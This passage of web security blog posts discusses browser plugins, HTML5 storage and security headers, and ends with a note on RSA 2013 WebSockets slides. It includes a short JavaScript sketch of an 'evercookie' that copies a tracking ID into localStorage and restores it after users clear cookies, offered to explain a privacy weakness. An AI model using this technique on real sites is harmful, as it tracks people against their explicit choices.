So, we have a persistent HTML injection tied to a user-tracking cookie. One mitigating factor in this vuln’s risk is that the effect is limited to individual visitors. It’d be nice if we could recommend getting rid of user tracking as the security solution, but the real issue is applying good software engineering practices when inserting client-side data into HTML. But we’re not done with user tracking yet. There’s this concept called privacy…

But that’s a story for another day.

Plugins Stand Out

A minor theme in my recent B-Sides SF presentation was the stagnancy of innovation since HTML4 was finalized in December 1999. New programming patterns emerged over that time, only to be hobbled by the outmoded spec. To help recall that era, I scoured the web for ancient curiosities of the last millennium. (Like Geocities’ announcement of 2MB of free hosting space.) One item I came across was a Netscape advisory regarding a Java bytecode vulnerability — in March 1996.

March 1996 Java Bytecode Vulnerability

Almost twenty years later Java still plagues browsers with continuous critical patches released month after month after month, including March 2013.

Java: Write none, uninstall everywhere.

The primary complaint against browser plugins is not their legacy of security problems (the list of which is exhausting to read). Nor is Java the only plugin to pick on: Flash has its own history of releasing nothing but critical updates. The greater issue is that even a secure plugin lives outside the browser’s Same Origin Policy (SOP).

When plugins exist outside the security and privacy controls enforced by browsers, they weaken the browsing experience. It’s true that plugins aren’t completely independent of these controls; their instantiation and usage with regard to the DOM still falls under the purview of SOP. However, the ways that plugins extend a browser (such as network and file access) are rife with security and privacy pitfalls.

For one example, Flash’s Local Storage Object (LSO) was easily abused as an “evercookie” because it was unaffected by clearing browser cookies, or even by a browser’s settings for accepting cookies in the first place. Yes, it’s still possible to abuse HTTP and HTML to establish evercookies. Even the lauded HTML5 Local Storage API could be abused in a similar manner. It’s for reasons like these that we should be as diligent about demanding “privacy patches” as we are about demanding security fixes.
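The mechanics are simple enough to sketch. This is a hypothetical illustration (with a stub standing in for the browser’s localStorage, and an invented "uid" key), not any particular vendor’s code: mirror the tracking ID into a second storage channel, then resurrect it when the cookie disappears.

```javascript
// Stub for the browser's localStorage so the sketch runs anywhere.
const localStorage = {
  _data: {},
  getItem(k) { return this._data[k] ?? null; },
  setItem(k, v) { this._data[k] = String(v); },
};

function syncTrackingId(cookieId) {
  if (cookieId !== null) {
    localStorage.setItem('uid', cookieId); // mirror the cookie into storage
    return cookieId;
  }
  return localStorage.getItem('uid');      // cookie cleared? resurrect it
}

syncTrackingId('a1b2c3');          // first visit seeds both channels
console.log(syncTrackingId(null)); // cookies wiped, yet the ID survives: a1b2c3
```

Clearing cookies alone never touches the second channel, which is exactly why “clear cookies” stopped being a meaningful privacy control.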

Unlike Flash, an HTML5 API like Local Storage is an open standard created by groups who review and balance the usability, security, and privacy implications of features designed to improve the browsing experience. Establishing a feature like Local Storage in the HTML spec, and aligning it with similar concepts like cookies and security controls like SOP (or HTML5 features like CORS, CSP, etc.), makes for a superior implementation in terms of integrating with users’ expectations and browser behavior. Instead of one vendor providing a means to extend a browser, browser vendors (the number of which is admittedly dwindling) are competing with each other to implement a uniform standard.

Sure, HTML5 brings new risks and preserves old vulnerabilities in new and interesting ways, but a large responsibility for those weaknesses lies with developers who would misuse an HTML5 feature in the same way they might have misused XHR and JSONP in the past. Maybe we’ll start finding plaintext passwords in Local Storage objects, or more sophisticated XSS exploits using Web Workers and WebSockets to scour data from a compromised browser. Security ignorance takes a long time to fix. And even experienced developers are challenged by maintaining the security of complex web applications.

HTML5 promises to obviate plugins altogether. We’ll have markup to handle video, drawing, sound, more events, and more features to create engaging games and apps. Browsers will compete on the implementation and security of these features rather than be crippled by the presence of plugins out of their control.

Getting rid of plugins makes our browsers more secure, but adopting HTML5 doesn’t imply browsers and web sites become secure. There are still vulnerabilities that we can’t fix by simple application design choices like including X-Frame-Options or adopting Content Security Policy headers.
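For what it’s worth, those two headers are cheap to add even though they aren’t a cure-all. Here’s a sketch of what a server might attach to its HTML responses; the values are illustrative, not a universal policy:

```javascript
// Illustrative response headers for clickjacking and content-injection
// defense. Real policies should be tuned to the app's actual origins.
function defensiveHeaders() {
  return {
    'X-Frame-Options': 'DENY',                        // refuse framing entirely
    'Content-Security-Policy': "default-src 'self'",  // load resources from own origin only
  };
}

console.log(defensiveHeaders());
```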


It’ll be a long time before everyone’s comfortable with the Dirty Harry test. Would you click on an unknown link — better yet, scan an inscrutable QR code — with your current browser? Would you still do it with multiple tabs open to your email, bank, and social networking accounts?

Who cares if “the network is the computer” or an application lives in the “cloud” or it’s offered via something-as-a-service? It’s your browser that’s the door to web apps; when that door isn’t secure, it’s an open window to your data.

RSA US 2013, ASEC-F41 Slides

Here are the slides for my presentation, Using HTML5 WebSockets Securely, at this year’s RSA US conference in San Francisco.

It’s a continuation of the content created for last year’s BlackHat and BayThreat presentations. RSA wants slides to be in a specific template, so these slides are less visually stimulating than the ones I usually have the freedom to create. (RSA demands an “Apply” slide at the end. Otherwise they don’t know if you told attendees how to apply what you were talking about for the last 45 minutes.) Still, the slides should convey some useful concepts for understanding and working with WebSockets.

This is hardly the end for this topic. But there’s a long list of other material that I need to finish before this protocol gets more attention.
